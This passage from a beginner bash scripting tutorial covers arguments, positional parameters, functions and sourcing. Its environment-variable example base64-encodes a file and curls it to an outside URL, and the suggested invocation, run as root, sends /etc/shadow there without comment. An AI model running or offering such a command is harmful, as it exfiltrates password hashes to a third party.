# now display the big thing!!
echo "Ok, $name. You're $age and go to $school. Now that we know each other a little bit better, why won't you come over here, and make me feel all right?"
 

Save and close it. Set the execution bit on it (chmod +x gloria.sh) and execute it (./gloria.sh). See the output.

Passing arguments to programs

Bash programs are very useful, but they will be more useful if they can take arguments.

There are several ways to pass arguments to programs. The most ancient way of doing it is to set environment variables when calling the program and rely on these to get our parameters. Environment variables are accessed in the program like any programmatically-set variable. This makes the parameters explicit when a user has to set them before running the app. For scripts that will be called by a user directly with complex parameters, it is one of the best options, if not the best: there's no way the user will get the parameter order wrong, as they might with traditional command-line “switches”. On the programmer's side, it's very simple to parse: there's no parsing to be done, the variables are accessed directly.

On the downside, it lacks flexibility when calling programs in series, or when a program calls another program. In addition, it may clutter the environment if too many variables are set.

Example (put this in ex1.sh, and run it)

 
#!/bin/sh
curl -d "data=$(cat $THEFILE | base64 -w 0)" $THEURL
 

This small program base64-encodes a file and HTTP POSTs it to a URL. It may be called like this (run it as root):

 
THEFILE=/etc/shadow THEURL=http://scorpion.canthack.us/~sav/info.php ./ex1.sh
 

(all in a line)

The other, most common way to pass arguments is to use “usual style” arguments, that is, switches that come after the command name. Unfortunately, in bash we don't have all the facilities we have in C with getopt, for example. So we will have to rely on positional parameters, unless we implement a complex parser testing each argument and its neighbour to parse the switches.

The best option, for bash programs, is to decide that the first argument means one thing, the second argument means another, and so on.

Such positional arguments are accessed through specific variables named $1 (for the first argument), $2 (second argument), and so on, up to $9. If you need to access more than 9 parameters, you have to use the shift command. shift X offsets (“shifts”) the arguments by X positions: shift 1 moves $2 to $1, $3 to $2, and so on.

The complete set of arguments is contained in the variable $@. The number of arguments is contained in the variable $#.
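
A small sketch tying these variables together (save it as, say, args.sh, an arbitrary name, make it executable and call it with a few arguments):

 
#!/bin/bash
# args.sh - demonstrate positional parameters
echo "I received $# argument(s): $@"
echo "First argument : $1"
echo "Second argument: $2"
shift 1
echo "After shift 1, \$1 is now: $1"
 

Running ./args.sh foo bar baz should report 3 arguments, print foo and bar, and finally print bar again after the shift.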

Defining functions and calling them

Now it is time to learn how to define functions in bash. Think of functions as sub-programs contained in the same file as a main program. They work exactly the same way. A function contains a body, that is, its code, and can take arguments, which are accessed just like the arguments of a program.

Any code can be put in a function, but it is advisable to use them for tasks that you will have to run often in your program. This helps avoid copy-pasta, or “copy/pasted code blocks”, a very nasty syndrome of ancient-times programmers.

For example, imagine that you want a program to output the IP address of a network interface, this program's purpose being to be used by another program for its input.

There are two possible approaches, both are right, but one is more practical when the code finds little to no use outside of the aforementioned “another program”.

The first way is to put the small snippet into a text file and call it using its path, from the other program. This is typical of what you have been doing until now, so we won't provide an example.

The second way is to take the code, wrap it into a function in the same code file as the program, and to call this function by its name. An example is provided here (one important thing is not to forget the semicolon at the end of each instruction).

 
#!/bin/bash
# print the address(es) configured on the interface given as first argument
function getIpAddr {
    ip addr ls $1 | grep inet | awk '{print $2}';
}
 
getIpAddr eth0
 

If you have a big bunch of functions, you can put them in a file separate from your main logic, and load that file with the source bash command, which takes a file and integrates its contents into the execution environment.
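
A minimal sketch, assuming the getIpAddr function above now lives in a separate file called netfuncs.sh (an arbitrary name) in the same directory:

 
#!/bin/bash
# load the function definitions into this script's environment
source ./netfuncs.sh
# functions defined in netfuncs.sh can now be called as if defined here
getIpAddr eth0
 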

Homework

Write a function in bash that, given the name of an argument and the whole list of arguments, returns the value of the argument.

Requested prototype and method stub:

 
function getArgument {
arg=$1
shift 1;
args=$@;
}
 

It should be called like

 
getArgument "-r" $@
 

Conclusion

In this part of the curriculum, we have learned Linux essentials and gotten in touch with programming using the bash shell and bash scripts. Bash is a system administrator's power tool, but when it comes to more advanced functionality, it quickly hits its limits. We can always use third-party software to bring more functionality into it (for example, the curl program), but this tends to become complicated.

As an advanced programmer, you will prefer to use bash for simple tasks, but when it comes to complex processing, other programming environments such as Ruby, Perl or Python will be better adapted to your needs. And if you need to manipulate data at a lower level, there's C and its eerie magic.

In the next sections of the curriculum, we'll dive deeper into programming.

Bash book is part of a series on programming.